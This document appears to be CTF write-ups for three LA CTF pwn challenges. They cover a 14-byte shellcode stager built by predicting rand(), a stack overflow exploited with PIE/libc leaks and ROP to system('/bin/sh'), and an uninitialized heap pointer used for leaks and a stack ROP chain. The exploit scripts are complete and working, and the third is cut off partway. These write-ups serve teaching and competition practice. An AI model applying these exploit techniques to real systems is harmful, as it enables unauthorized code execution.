Scrabble for ASM! A pwn challenge where the program generates 14 random byte "tiles", allows swapping individual tiles (replaced with the next `rand() & 0xFF` value), and then copies the 14-byte hand to an RWX page at `0x13370000` and executes it as shellcode. The key constraints: only 14 bytes of shellcode, swaps produce random values you can't see, and `srand(time(NULL))` seeds the PRNG.

#### Solution

**Approach:** Brute-force the PRNG seed from the displayed initial hand, predict all future `rand()` values, then use a greedy algorithm to construct a 14-byte read stager that loads full shellcode as a second stage.

**Stager shellcode (14 bytes):** Calls `read(0, 0x1337000e, 255)` to read stage 2 shellcode from stdin directly after the stager. After `syscall` returns, execution falls through to offset `0x0e` where stage 2 was written.

```asm
xor eax, eax           ; syscall 0 = read
xor edi, edi           ; fd = 0 (stdin)
cdq                    ; rdx = 0 (sign-extend eax)
mov esi, 0x1337000e    ; buf = right after stager
mov dl, 0xff           ; count = 255
syscall                ; falls through to stage 2 at offset 0x0e
```

**Greedy tile assignment:** Rather than processing tiles sequentially (each tile swapped until correct, \~3000 swaps), each `rand()` value is checked against ALL unfinished tiles. If it matches any tile's target byte, that tile is assigned. Otherwise the value is wasted on any unfinished tile. This reduces swaps from \~3000 to \~800, critical for staying within the server timeout.
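
The swap counts can be sanity-checked with a quick simulation, using uniform random bytes as a stand-in for glibc's `rand() & 0xFF` (the exact averages depend on this model):

```python
import random

def avg_swaps(n_tiles=14, trials=300, greedy=True, seed=0):
    """Average number of swaps to hit every tile's target byte."""
    rng = random.Random(seed)
    total = 0
    for _ in range(trials):
        targets = [rng.randrange(256) for _ in range(n_tiles)]
        if greedy:
            # Offer each drawn value to every unfinished tile.
            unfinished = set(range(n_tiles))
            while unfinished:
                v = rng.randrange(256)
                total += 1
                hit = next((i for i in unfinished if targets[i] == v), None)
                if hit is not None:
                    unfinished.discard(hit)
        else:
            # Sequential: finish tile 0, then tile 1, and so on.
            for i in range(n_tiles):
                total += 1
                while rng.randrange(256) != targets[i]:
                    total += 1
    return total / trials

print(round(avg_swaps(greedy=True)), round(avg_swaps(greedy=False)))
```

The greedy average is roughly `256 * (1/14 + 1/13 + ... + 1/1)`, a coupon-collector-style sum of about 830 draws, versus roughly `14 * 256` for the sequential strategy.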

```python
#!/usr/bin/env python3
from pwn import *
import ctypes
import time as time_mod
import re

context.arch = 'amd64'
context.os = 'linux'

libc = ctypes.CDLL("libc.so.6")
HAND_SIZE = 14

stager = asm("""
    xor eax, eax
    xor edi, edi
    cdq
    mov esi, 0x1337000e
    mov dl, 0xff
    syscall
""")
assert len(stager) == HAND_SIZE

stage2 = asm(shellcraft.sh())

p = remote("chall.lac.tf", 31338)
connect_time = int(time_mod.time())

data = p.recvuntil(b"> ")
hand_hex = re.findall(r'\| ([0-9a-f]{2}) ', data.decode())
initial_hand = [int(h, 16) for h in hand_hex[:HAND_SIZE]]

# Brute force srand(time(NULL)) seed from displayed hand
found_seed = None
for delta in range(-300, 60):
    seed = connect_time + delta
    libc.srand(seed)
    predicted = [libc.rand() & 0xFF for _ in range(HAND_SIZE)]
    if predicted == initial_hand:
        found_seed = seed
        break
assert found_seed is not None

# Advance PRNG past initial hand generation
libc.srand(found_seed)
for _ in range(HAND_SIZE):
    libc.rand()

# Greedy swap plan
plan = []
sim = list(initial_hand)
unfinished = {}
targets = {}
for i in range(HAND_SIZE):
    if sim[i] != stager[i]:
        unfinished[i] = stager[i]
        targets.setdefault(stager[i], set()).add(i)

while unfinished:
    val = libc.rand() & 0xFF
    if val in targets and targets[val]:
        tile = targets[val].pop()
        if not targets[val]:
            del targets[val]
        del unfinished[tile]
        plan.append(tile)
        sim[tile] = val
    else:
        dummy = next(iter(unfinished))
        plan.append(dummy)
        sim[dummy] = val

# Send all swaps + play as a single batch
payload = b""
for idx in plan:
    payload += f"1\n{idx}\n".encode()
payload += b"2\n"
p.send(payload)

p.recvuntil(b"TRIPLE WORD SCORE!", timeout=300)
time_mod.sleep(0.5)
p.send(stage2)
p.sendline(b"cat /app/flag.txt")
p.interactive()
```

**Flag:** `lactf{gg_y0u_sp3ll3d_sh3llc0d3}`

### adventure

#### Description

Text-adventure pwnable.

Remote: `nc chall.lac.tf 31337`

#### Solution

The game is a 16x16 grid with 8 items. Grabbing the Flag triggers a password prompt.

**1) Bug: stack overflow in `check_flag_password`**

In `attachments/chall.c`:

* `char password[0020];` where `0020` is octal = 16 bytes
* `fgets(password, 0x20, stdin);` reads up to 31 bytes + NUL

So we can overwrite saved `rbp` and the return address.

**2) Leak PIE base via board layout**

`init_board()` places each item using a byte of the *runtime* address of `main`:

* For item index `i`, it uses `bytes[i]` (byte `i` of the little-endian `main` pointer)
* `x = high_nibble(bytes[i])`, `y = low_nibble(bytes[i])`
* If the cell collides, it linearly probes forward.

By walking the whole grid (serpentine), we record each item’s final `(x,y)`. We then invert the placement algorithm to recover `main` and compute:

* `pie_base = main_addr - 0x1adf`

Collision probing can create ambiguities; the exploit resolves them by enforcing that `(main_addr - 0x1adf) & 0xfff == 0` (PIE base must be page-aligned).
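
The placement and its inversion can be checked round-trip on a toy model. The probing rule mirrors the description above, and the example address bytes are made up; the real exploit's `reconstruct_address` applies the same idea to the observed item cells:

```python
BOARD_SIZE = 16
NUM_ITEMS = 8

def probe(b, occupied):
    """Map byte b to a cell via its nibbles, linear-probing past occupied cells."""
    x, y = (b >> 4) & 0xF, b & 0xF
    while (x, y) in occupied:
        x = (x + 1) % BOARD_SIZE
        if x == 0:
            y = (y + 1) % BOARD_SIZE
    return x, y

def place_items(addr_bytes):
    """Place items 7..0 from the little-endian address bytes."""
    occupied, pos = set(), {}
    for i in range(NUM_ITEMS - 1, -1, -1):
        pos[i] = probe(addr_bytes[i], occupied)
        occupied.add(pos[i])
    return pos

def candidate_bytes(i, pos):
    """All byte values consistent with item i's observed cell."""
    occupied = {pos[j] for j in range(i + 1, NUM_ITEMS)}
    return [b for b in range(256) if probe(b, occupied) == pos[i]]

# Made-up main pointer, little-endian bytes (high two bytes are zero).
addr = [0xDF, 0x5A, 0x23, 0x7F, 0xC1, 0x55, 0x00, 0x00]
pos = place_items(addr)
ok = all(addr[i] in candidate_bytes(i, pos) for i in range(6))
print(ok)  # True: the true byte is always among the candidates
```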

**3) Turn the overflow into a `.bss` write primitive**

We return into the middle of `check_flag_password` right before its `fgets` call (`FGETS_SETUP`), with a controlled `rbp`.

Setting `rbp = pie_base + 0x4030` makes the buffer pointer used by that `fgets` (`rbp - 0x10`) equal `pie_base + 0x4020`, which is the global `last_item` pointer. That `fgets` becomes a 31-byte write into the writable `.bss` page.

**4) Leak libc via `last_item` printing**

`print_inventory()` prints `last_item` with `%-6s`. If we overwrite `last_item = &GOT[puts]`, the inventory line outputs the raw little-endian bytes of the resolved libc `puts` pointer (until the first NUL), giving a libc leak and therefore `libc_base`.

**5) ROP chain and pivots**

The binary has no `pop rdi; ret`, so the exploit uses:

* The global `history` array as a tiny ROP stack (each command can store 6 bytes of an address).
* A double `leave; ret` pivot to start executing from `history`.
* Two more redirected `fgets` calls to write a minimal libc ROP chain into high `.bss`.

Final libc chain calls `system("/bin/sh")`, then the exploit sends `cat /app/flag.txt`.

**6) Flag path in jail**

The Dockerfile copies the rootfs to `/srv` and then runs under `pwn.red/jail`, which typically chroots into `/srv`. That makes `/srv/app/flag.txt` in the image visible as `/app/flag.txt` to the running program and spawned shell.

**Exploit**

```python
#!/usr/bin/env python3
from pwn import *
import re
import sys

context.binary = ELF('./attachments/chall', checksec=False)
context.log_level = 'info'

LIBC_PATH = '/lib/x86_64-linux-gnu/libc.so.6'
libc = ELF(LIBC_PATH, checksec=False)

# Binary offsets
MAIN        = 0x1ADF
CHECK_FLAG  = 0x15B5
FGETS_SETUP = 0x164D  # mid-check_flag_password: loads stdin, lea rax,[rbp-0x10], fgets
LEAVE_RET   = 0x14B7
POP_RBP_RET = 0x1233
RET         = 0x101A
PRINT_INV   = 0x138B
GOT_PUTS    = 0x3F98
LAST_ITEM   = 0x4020
HISTORY     = 0x40A0

# High scratch in the single RW .bss page (PIE+0x4000..PIE+0x4fff). Keep this near
# the end of the page so libc calls won't smash copy-relocated globals (stdout/stderr).
# Also pick %16 == 8 for correct system() entry alignment.
CHAIN_BASE  = 0x4FC8

NUM_ITEMS = 8
BOARD_SIZE = 16

def connect():
    if args.REMOTE or args.R:
        return remote('chall.lac.tf', 31337)
    elif args.STRACE:
        # Useful for confirming whether our final ROP actually reaches system()
        # (look for execve("/bin/sh", ...) in /tmp/adventure.strace).
        return process(['strace', '-f', '-o', '/tmp/adventure.strace', './attachments/chall'])
    else:
        return process('./attachments/chall')

def send_cmd(r, cmd):
    """Send a game command and return the response."""
    r.sendline(cmd.encode() if isinstance(cmd, str) else cmd)
    resp = r.recvuntil(b'> ', timeout=10)
    return resp

def send_raw_cmd(r, data):
    """Send raw bytes as a command (for planting chain in history)."""
    r.send(data)
    # `data` already ends with a newline, which completes the fgets read.
    resp = r.recvuntil(b'> ', timeout=10)
    return resp

def explore_board(r):
    """Walk the board in serpentine pattern, find all items. Returns dict {item_idx: (x, y)}."""
    items = {}
    px, py = 0, 0  # start position

    def parse_spot(resp):
        """Check if we spotted an item."""
        for i, name in enumerate(["Sword", "Shield", "Potion", "Key", "Scroll", "Amulet", "Crown", "Flag"]):
            if f"spot a {name}".encode() in resp or f"glimmering {name}".encode() in resp:
                return i, name
        return None, None

    # Check starting position (0,0)
    resp = send_cmd(r, "look")
    idx, name = parse_spot(resp)
    if idx is not None:
        items[idx] = (px, py)
        log.info(f"Found {name} (idx={idx}) at ({px},{py})")

    moves_used = 1  # for the 'look' command

    # Serpentine walk
    for row in range(BOARD_SIZE):
        if row > 0:
            resp = send_cmd(r, "s")
            py += 1
            moves_used += 1
            idx, name = parse_spot(resp)
            if idx is not None:
                items[idx] = (px, py)
                log.info(f"Found {name} (idx={idx}) at ({px},{py})")

        if row % 2 == 0:
            # Go east
            for col in range(BOARD_SIZE - 1):
                resp = send_cmd(r, "e")
                px += 1
                moves_used += 1
                idx, name = parse_spot(resp)
                if idx is not None:
                    items[idx] = (px, py)
                    log.info(f"Found {name} (idx={idx}) at ({px},{py})")
                if len(items) == NUM_ITEMS:
                    return items, px, py, moves_used
        else:
            # Go west
            for col in range(BOARD_SIZE - 1):
                resp = send_cmd(r, "w")
                px -= 1
                moves_used += 1
                idx, name = parse_spot(resp)
                if idx is not None:
                    items[idx] = (px, py)
                    log.info(f"Found {name} (idx={idx}) at ({px},{py})")
                if len(items) == NUM_ITEMS:
                    return items, px, py, moves_used

    return items, px, py, moves_used

def reconstruct_address(items):
    """Given item positions, reconstruct the address of main."""
    # bytes[7] and bytes[6] are 0x00 (48-bit canonical address)
    candidates = {i: [] for i in range(8)}
    candidates[6] = [0]
    candidates[7] = [0]

    # Items placed in order i=7,6,...,0. The final position of item i depends on
    # byte[i] and the occupied cells from items i+1..7.
    for i in range(5, -1, -1):
        occupied = {items[j] for j in range(i + 1, NUM_ITEMS) if j in items}
        want = items.get(i)
        if want is None:
            raise ValueError(f"missing item {i} for PIE reconstruction")

        for b in range(256):
            x = (b >> 4) & 0x0F
            y = b & 0x0F
            while (x, y) in occupied:
                x = (x + 1) % BOARD_SIZE
                if x == 0:
                    y = (y + 1) % BOARD_SIZE
            if (x, y) == want:
                candidates[i].append(b)

        if not candidates[i]:
            raise ValueError(f"no candidates for byte {i}")

    # Resolve ambiguities by enforcing that the derived PIE base is page-aligned:
    #   pie_base = main_addr - MAIN  =>  (main_addr - MAIN) & 0xfff == 0
    target_low12 = MAIN & 0xFFF

    best = None
    # Prune early using the low 12-bit constraint once byte0/byte1 are chosen.
    for b0 in candidates[0]:
        for b1 in candidates[1]:
            low12 = b0 | ((b1 & 0x0F) << 8)
            if low12 != target_low12:
                continue
            for b2 in candidates[2]:
                for b3 in candidates[3]:
                    for b4 in candidates[4]:
                        for b5 in candidates[5]:
                            addr = (
                                (b0 << 0)  |
                                (b1 << 8)  |
                                (b2 << 16) |
                                (b3 << 24) |
                                (b4 << 32) |
                                (b5 << 40)
                            )
                            # bytes[6]=bytes[7]=0 already.
                            if ((addr - MAIN) & 0xFFF) != 0:
                                continue
                            best = addr
                            break
                        if best is not None:
                            break
                    if best is not None:
                        break
                if best is not None:
                    break
            if best is not None:
                break
        if best is not None:
            break

    if best is None:
        raise ValueError("PIE reconstruction ambiguous; no page-aligned solution")
    return best

def navigate_to(r, px, py, tx, ty):
    """Navigate from (px,py) to (tx,ty). Returns moves used."""
    moves = 0
    while px != tx:
        if px < tx:
            send_cmd(r, "e")
            px += 1
        else:
            send_cmd(r, "w")
            px -= 1
        moves += 1
    while py != ty:
        if py < ty:
            send_cmd(r, "s")
            py += 1
        else:
            send_cmd(r, "n")
            py -= 1
        moves += 1
    return moves, px, py

def plant_history_entry(r, addr_value):
    """Send a game command that stores addr_value in the current history entry.
    addr_value is an 8-byte int. We send the low 6 bytes + newline."""
    addr_bytes = p64(addr_value)
    # The main loop stores commands as C strings (strcspn/strncpy/strlen/strcmp).
    # If any of the first 6 bytes are NUL or LF, the history entry will truncate
    # and our "address" qword becomes garbage. Treat this as a hard failure and
    # retry with a fresh ASLR layout.
    for j in range(6):
        if addr_bytes[j] == 0x00:
            raise ValueError(f"history addr has NUL at byte {j}: {hex(addr_value)}")
        if addr_bytes[j] == 0x0a:
            raise ValueError(f"history addr has LF at byte {j}: {hex(addr_value)}")

    payload = addr_bytes[:6] + b'\n'
    r.send(payload)
    resp = r.recvuntil(b'> ', timeout=10)
    return resp

def overflow_payload(rbp_val, ret_val):
    """Build the 31-byte overflow payload for check_flag_password.
    16 bytes padding + 8 bytes rbp + 7 bytes ret (8th byte = 0x00 from fgets)."""
    payload = b'A' * 16
    payload += p64(rbp_val)
    payload += p64(ret_val)[:7]  # 7 bytes, 8th set to 0x00 by fgets
    assert len(payload) == 31
    return payload

def fgets_redirect_payload(write_val_0, write_val_1, new_rbp, ret_addr):
    """Build the 31-byte payload for the redirected fgets.
    Writes to [old_rbp - 0x10]:
    bytes 0-7: write_val_0 (at target)
    bytes 8-15: write_val_1 (at target+8)
    bytes 16-23: new_rbp (for leave;ret)
    bytes 24-30: ret_addr low 7 bytes (for leave;ret)
    """
    payload = p64(write_val_0)
    payload += p64(write_val_1)
    payload += p64(new_rbp)
    payload += p64(ret_addr)[:7]
    assert len(payload) == 31
    return payload

def has_bad_newline_bytes(data: bytes) -> bool:
    return b'\n' in data

def ensure_no_newline(payload: bytes, label: str):
    if has_bad_newline_bytes(payload):
        raise ValueError(f"{label} contains newline byte; fgets would truncate it")

def wait_password(r):
    return r.recvuntil(b'Password: ', timeout=15)

def exploit_once():
    r = connect()

    # Receive banner and help
    r.recvuntil(b'> ', timeout=15)

    log.info("=== Phase 1: Board Exploration & PIE Leak ===")
    items, px, py, moves_used = explore_board(r)
    log.info(f"Found {len(items)} items in {moves_used} moves. Position: ({px},{py})")

    if len(items) < NUM_ITEMS:
        log.warning(f"Only found {len(items)}/8 items!")
        for i in range(NUM_ITEMS):
            if i not in items:
                log.warning(f"  Missing item {i}")

    # Reconstruct PIE base
    main_addr = reconstruct_address(items)
    pie_base = main_addr - MAIN
    log.info(f"Reconstructed main addr: {hex(main_addr)}")
    log.info(f"PIE base: {hex(pie_base)}")

    # Verify sanity
    if pie_base & 0xFFF != 0:
        log.error("PIE base not page-aligned! Something went wrong.")
        r.close()
        return
    if (pie_base >> 40) not in [0x55, 0x56, 0x00]:
        log.warning(f"Unusual PIE base high byte: {hex(pie_base >> 40)}")

    # Check for bad bytes in key addresses
    def check_addr(name, addr):
        bs = p64(addr)
        for j in range(6):
            if bs[j] == 0x00:
                log.warning(f"{name} ({hex(addr)}) has null at byte {j}")
                return False
            if bs[j] == 0x0a:
                log.warning(f"{name} ({hex(addr)}) has newline at byte {j}")
                return False
        return True

    check_addr("PRINT_INV", pie_base + PRINT_INV)
    check_addr("MAIN", pie_base + MAIN)
    check_addr("LEAVE_RET", pie_base + LEAVE_RET)

    log.info("=== Phase 2: Plant ROP Chains In History ===")
    # chainA:
    #   dummy_rbp
    #   print_inventory               (leaks puts via last_item=&GOT[puts])
    #   pop rbp; ret
    #   rbp = CHAIN_BASE+0x10
    #   FGETS_SETUP                   (stage3 write1 input)
    #
    # chainB:
    #   dummy_rbp
    #   pop rbp; ret
    #   rbp = CHAIN_BASE+0x20
    #   FGETS_SETUP                   (stage3 write2 input)
    chain_base_addr = pie_base + CHAIN_BASE
    chainA_idx = moves_used
    chainA_addr = pie_base + HISTORY + 8 * chainA_idx
    chainB_idx = chainA_idx + 5
    chainB_addr = pie_base + HISTORY + 8 * chainB_idx

    log.info(f"Planting chainA at history[{chainA_idx}] (addr={hex(chainA_addr)})")
    send_cmd(r, "AAAAAA")  # dummy rbp (<=6 bytes: consumes newline)
    moves_used += 1
    plant_history_entry(r, pie_base + PRINT_INV)
    moves_used += 1
    plant_history_entry(r, pie_base + POP_RBP_RET)
    moves_used += 1
    plant_history_entry(r, chain_base_addr + 0x10)
    moves_used += 1
    plant_history_entry(r, pie_base + FGETS_SETUP)
    moves_used += 1

    log.info(f"Planting chainB at history[{chainB_idx}] (addr={hex(chainB_addr)})")
    send_cmd(r, "BBBBBB")  # dummy rbp
    moves_used += 1
    plant_history_entry(r, pie_base + POP_RBP_RET)
    moves_used += 1
    plant_history_entry(r, chain_base_addr + 0x20)
    moves_used += 1
    plant_history_entry(r, pie_base + FGETS_SETUP)
    moves_used += 1

    log.info(f"Chains planted. Moves used: {moves_used}")

    log.info("=== Phase 3: Navigate to Flag and Grab ===")
    flag_pos = items.get(7)
    if flag_pos is None:
        log.error("Flag item not found on board!")
        r.close()
        return

    nav_moves, px, py = navigate_to(r, px, py, flag_pos[0], flag_pos[1])
    moves_used += nav_moves
    log.info(f"Navigated to Flag at {flag_pos}. Moves: {moves_used}")

    # Grab the flag - this triggers check_flag_password
    r.sendline(b"grab")
    moves_used += 1
    # Should get the flag password prompt
    resp = wait_password(r)
    log.info("Got password prompt (1st check_flag_password)")

    log.info("=== Phase 4: Overflow → Jump To FGETS_SETUP (Write last_item) ===")
    # rbp = PIE+0x4030, so buffer=rbp-0x10 points to last_item (PIE+0x4020).
    payload1 = overflow_payload(pie_base + 0x4030, pie_base + FGETS_SETUP)
    ensure_no_newline(payload1, "overflow_to_fgets")
    r.send(payload1)

    log.info("=== Phase 5: Redirected Fgets Payload (last_item=&GOT[puts], pivot chainA) ===")
    payload2 = fgets_redirect_payload(
        write_val_0 = pie_base + GOT_PUTS,    # last_item = &GOT[puts]
        write_val_1 = 0x4141414141414141,    # padding at PIE+0x4028
        new_rbp     = chainA_addr,           # pivot to chainA
        ret_addr    = pie_base + LEAVE_RET,
    )
    ensure_no_newline(payload2, "redirected_fgets_leak")
    r.send(payload2)

    log.info("=== Phase 6: Parse Libc Leak ===")
    # We should now run print_inventory (leak) and return into check_flag_password.
    r.recvuntil(b'/300 ', timeout=15)
    leaked_bytes = r.recvn(6, timeout=5)
    puts_addr = u64(leaked_bytes + b'\x00\x00')
    libc_base = puts_addr - libc.symbols['puts']
    log.info(f"Leaked puts address: {hex(puts_addr)}")
    log.info(f"Libc base: {hex(libc_base)}")

    if libc_base & 0xFFF != 0:
        log.error("Libc base not page-aligned; leak likely failed.")
        r.close()
        return

    log.info("=== Phase 7: Stage 3 system('/bin/sh') (No Banner) ===")
    rop_libc = ROP(libc)
    pop_rdi = rop_libc.find_gadget(['pop rdi', 'ret']).address + libc_base
    binsh = next(libc.search(b'/bin/sh\x00')) + libc_base
    system = libc.symbols['system'] + libc_base

    # chainA has already returned into FGETS_SETUP with rbp=CHAIN_BASE+0x10.
    # First stage3 write pivots to chainB.
    payload_w1 = fgets_redirect_payload(
        write_val_0 = 0x4141414141414141,   # dummy rbp at CHAIN_BASE
        write_val_1 = pop_rdi,              # CHAIN_BASE+8
        new_rbp     = chainB_addr,          # pivot to chainB in history
        ret_addr    = pie_base + LEAVE_RET,
    )
    ensure_no_newline(payload_w1, "stage3_write1")

    # chainB sets rbp=CHAIN_BASE+0x20 and returns into FGETS_SETUP; second write pivots to CHAIN_BASE.
    payload_w2 = fgets_redirect_payload(
        write_val_0 = binsh,                # CHAIN_BASE+0x10
        write_val_1 = system,               # CHAIN_BASE+0x18
        new_rbp     = chain_base_addr,      # pivot base for leave;ret gadget
        ret_addr    = pie_base + LEAVE_RET,
    )
    ensure_no_newline(payload_w2, "stage3_write2")

    r.send(payload_w1 + payload_w2)

    # In the `pwn.red/jail` image, the ubuntu rootfs is usually mounted/chrooted at `/`,
    # so files copied to `/srv/app/...` in the Dockerfile become `/app/...` at runtime.
    cmd = args.CMD.encode() if getattr(args, "CMD", None) else b'cat /app/flag.txt'
    r.sendline(cmd)
    buf = b''
    # Bytes regex. In a raw string, write `\{` (not `\\{`) to match a literal `{`.
    flag_re = re.compile(rb'lactf\{[^\n}]+\}')
    for _ in range(40):
        try:
            chunk = r.recv(timeout=1)
        except EOFError:
            break
        if not chunk:
            continue
        buf += chunk
        m = flag_re.search(buf)
        if m:
            flag = m.group(0)
            log.success(f"FLAG: {flag.decode(errors='ignore')}")
            if args.INTERACTIVE:
                r.interactive()
            r.close()
            return flag

    log.warning(f"Did not find flag in output; captured {len(buf)} bytes")
    if getattr(args, "DUMP", False):
        # Debugging aid: show what we actually got back.
        log.info("First 256 bytes of output:\n" + hexdump(buf[:256]))
    if args.INTERACTIVE:
        r.interactive()
    r.close()
    return None

if __name__ == '__main__':
    # ASLR occasionally produces addresses containing a newline byte. Since all of our
    # writes are through fgets, that would truncate payloads and break exploitation.
    max_tries = 1 if getattr(args, "ONCE", False) else 50
    for i in range(1, max_tries + 1):
        try:
            flag = exploit_once()
            if flag:
                # Print a clean flag line for tooling/grep.
                if isinstance(flag, bytes):
                    flag = flag.decode(errors='ignore')
                print(flag)
                break
        except (ValueError, EOFError) as e:
            log.warning(f"Attempt {i}/{max_tries} failed: {e}")
        except Exception as e:
            # Keep retries narrow but practical for CTF use.
            log.warning(f"Attempt {i}/{max_tries} failed (unexpected): {type(e).__name__}: {e}")
```

### ourukla (pwn, 308 pts, 24 solves)

#### Description

A student management system ("ourUKLA v0.1.7") with add/get/remove operations. Source provided. Binary is amd64 with Partial RELRO, no canary, NX, PIE. Ships with glibc 2.41.

#### Solution

The bug is an **uninitialized `sinfo` pointer** in `add_student()`. When `malloc(sizeof(struct student))` returns a recycled (non-top) chunk, the student struct's `sinfo` field contains stale heap data instead of being zeroed. The code only NULLs `sinfo` when the allocation came from the top chunk:

```c
char* old_top = *((char**)puts + (0x166580/8)) + 0x10;  // libc internal: main_arena.top
struct student *s = ourUKLA[cur_index] = malloc(sizeof(struct student));
if ((void *)old_top == (void *)s) s->sinfo = NULL;       // only NULL if from top chunk!
```

If the student is added without filling info (`add_empty`), the stale `sinfo` pointer persists. When `get_student_info()` later dereferences it, it reads from whatever the pointer happens to point at.

**Struct layout:**

```
student (0x20 chunk):     [array_id:8][uid:8][sinfo*:8]
student_info (0xf0 alloc): [noeditingmyptrs:0x10][name*:8][attributes:8][major:0x40][aux:0x90]
```

The exploit has four phases, each leveraging a **double-split primitive**: plant a controlled value inside an unsorted chunk via one student's `sinfo->major` write, then split that unsorted chunk nine more times so the 10th split's student struct lands on the planted value and adopts it as its stale `sinfo`.

**Phase 1 - Libc leak:** Fill tcache bins for 0x20/0x100/0x110, then free a student pair to create a 0x210 unsorted chunk. Drain tcache\[0x20], then `add_empty` pulls from the fastbin. The recycled student struct has a stale `sinfo` pointing into the unsorted chunk, whose `fd` contains a libc arena pointer. `get_student_info` prints `sinfo->name` = unsorted fd = libc leak.

**Phase 2 - Stack leak:** Use the double-split primitive to plant `__environ - 0x18` as a fake sinfo pointer. When `get_student_info` prints `sinfo->attributes` (at sinfo+0x18), it reads `*(__environ)` which is a stack address.

**Phase 3 - PIE leak:** Same technique targeting a stack return address at `__environ - 0x30` to leak PIE base.

**Phase 4 - Stack ROP:** The key insight is that `fill_student_info` writes to `sinfo->major` (at sinfo+0x20) via `read()`. By planting `sinfo = __environ - 0x160`, the major write lands at `__environ - 0x140`, which is exactly `add_student`'s return address on the stack. The offset must be chosen carefully: `sinfo+0x10` (the name pointer write) must NOT collide with `fill_student_info`'s own sinfo local variable at `__environ - 0x190`. With sinfo = env-0x160:

| Write              | Stack Location | What's There                              |
| ------------------ | -------------- | ----------------------------------------- |
| sinfo+0x10 (name)  | env-0x150      | add\_student saved rbx (harmless)         |
| sinfo+0x18 (attrs) | env-0x148      | add\_student saved rbp (harmless)         |
| sinfo+0x20 (major) | env-0x140      | add\_student return addr -> **ROP chain** |
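
The offsets in the table reduce to small arithmetic; a quick sanity check (the `__environ` value below is a made-up example):

```python
# Check the Phase 4 stack-offset arithmetic from the table above.
ENV = 0x7FFC_DEAD_0000          # hypothetical __environ value, for illustration
sinfo = ENV - 0x160             # the planted fake sinfo pointer

assert sinfo + 0x10 == ENV - 0x150  # name pointer write -> saved rbx (harmless)
assert sinfo + 0x18 == ENV - 0x148  # attributes write   -> saved rbp (harmless)
assert sinfo + 0x20 == ENV - 0x140  # major write        -> return address

# The name-pointer write must not collide with fill_student_info's own
# sinfo local variable at __environ - 0x190:
assert sinfo + 0x10 != ENV - 0x190
print("offsets consistent")
```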

The ROP chain is `pop rdi; ret` -> `"/bin/sh"` -> `ret` (alignment) -> `system`.

No stack canary means the overwrite goes undetected. When `add_student` returns, it jumps into the ROP chain and spawns a shell.

```python
#!/usr/bin/env python3
"""
ourukla exploit - LA CTF pwn (308 pts)
Uninitialized sinfo pointer when malloc returns recycled (non-top) chunk.

Phase 1: Libc leak via unsorted bin fd through stale sinfo->name
Phase 2: __environ leak via attributes single-deref read
Phase 3: PIE leak via stack return address
Phase 4: Stack ROP - write ROP chain to add_student's return address
"""
import os, re
from pwn import *

context.binary = ELF("attachments/chall", checksec=False)
elf = context.binary
libc = ELF("libs/libc.so.6.real", checksec=False)
context.log_level = os.environ.get("LOG", "info")

HOST, PORT = "chall.lac.tf", 31147
LEAK_OFF   = 0x1e6c20   # unsorted bin fd -> libc base
STACK_OFF  = 0x30        # __environ value - 0x30 = PIE retaddr on stack
PIE_OFF    = 0x10e1      # retaddr - PIE base
POP_RDI_RET = 0x2a145
RET_GADGET  = 0x2846b

def start():
    if args.REMOTE:
        return remote(HOST, PORT)
    return process(["./libs/ld-linux-x86-64.so.2.real",
                    "--library-path", "./libs", "./attachments/chall"])

def pad(b, n):
    return b.ljust(n, b"\x00")

io = None
cidx = 0
uid_ctr = [100]

def nuid():
    u = uid_ctr[0]; uid_ctr[0] += 1; return u

def menu():
    io.recvuntil(b"Option > ")

def add_full(uid, name=b"A", major=b"B", attr=0):
    global cidx; cidx = (cidx + 1) % 10
    io.sendline(b"1")
    io.sendlineafter(b"Enter student UID: ", str(uid).encode())
    io.sendlineafter(b"Enter student information now", b"y")
    io.sendafter(b"Student name: ", pad(name, 0x100))
    io.sendafter(b"Student major: ", pad(major, 0x40))
    io.sendlineafter(b"Student attributes", str(attr).encode())
    io.sendlineafter(b"(y/n)? ", b"n")
    menu()

def add_empty(uid):
    global cidx; cidx = (cidx + 1) % 10
    io.sendline(b"1")
    io.sendlineafter(b"Enter student UID: ", str(uid).encode())
    io.sendlineafter(b"Enter student information now", b"n")
    menu()

def remove(uid):
    io.sendline(b"3")
    io.sendlineafter(b"Enter student UID: ", str(uid).encode())
    menu()

def get_info(uid):
    io.sendline(b"2")
    io.sendlineafter(b"Enter student UID: ", str(uid).encode())
    return io.recvuntil(b"Option > ")

def create_unsorted_0x210():
    """Fill tcache, free a pair to create 0x210 unsorted chunk, drain tcache[0x20]."""
    drain = []
    for _ in range(7):
        u = nuid(); add_full(u, name=b"D", major=b"D"); drain.append(u)
    pair = nuid(); add_full(pair, name=b"P", major=b"P")
    guard = nuid(); add_full(guard, name=b"G", major=b"G")
    for u in drain:
        remove(u)
    remove(pair)
    for _ in range(7):
        add_empty(nuid())

def write_and_split(value):
    """
    Plant value into unsorted chunk via split1's stale sinfo major write.
    Split10 reads it as sinfo. Returns split10's uid.
    """
    u_w = nuid()
    global cidx; cidx = (cidx + 1) % 10
    io.sendline(b"1")
    io.sendlineafter(b"Enter student UID: ", str(u_w).encode())
    io.sendlineafter(b"Enter student information now", b"y")
    io.sendafter(b"Student name: ", pad(b"X", 0x100))
    io.sendafter(b"Student major: ", pad(b"\x00" * 0x10 + p64(value), 0x40))
    io.sendlineafter(b"Student attributes", b"0")
    io.sendlineafter(b"(y/n)? ", b"n")
    menu()
    for _ in range(8):
        add_empty(nuid())
    reader = nuid()
    add_empty(reader)
    return reader

def write_and_split_writer(value):
    """Same but the 10th split student is added by caller with fill_student_info."""
    u_w = nuid()
    global cidx; cidx = (cidx + 1) % 10
    io.sendline(b"1")
    io.sendlineafter(b"Enter student UID: ", str(u_w).encode())
    io.sendlineafter(b"Enter student information now", b"y")
    io.sendafter(b"Student name: ", pad(b"X", 0x100))
    io.sendafter(b"Student major: ", pad(b"\x00" * 0x10 + p64(value), 0x40))
    io.sendlineafter(b"Student attributes", b"0")
    io.sendlineafter(b"(y/n)? ", b"n")
    menu()
    for _ in range(8):
        add_empty(nuid())

def main():
    global io, cidx
    io = start()
    io.timeout = float(os.environ.get("TIMEOUT", "5.0"))
    menu()

    # Phase 1: Libc leak
    for i in range(9):
        add_full(1000 + i, name=b"N", major=b"M")
    for i in range(7):
        remove(1000 + i)
    remove(1007)
    for _ in range(7):
        add_empty(nuid())
    leak_uid = nuid()
    add_empty(leak_uid)

    out = get_info(leak_uid)
    m = re.search(br"Student Name: (.*)\n", out)
    raw = m.group(1)
    libc_base = u64(raw[:6].ljust(8, b"\x00")) - LEAK_OFF
    log.success(f"libc base: {libc_base:#x}")

    # Phase 2: __environ leak
    environ_addr = libc_base + libc.symbols["__environ"]
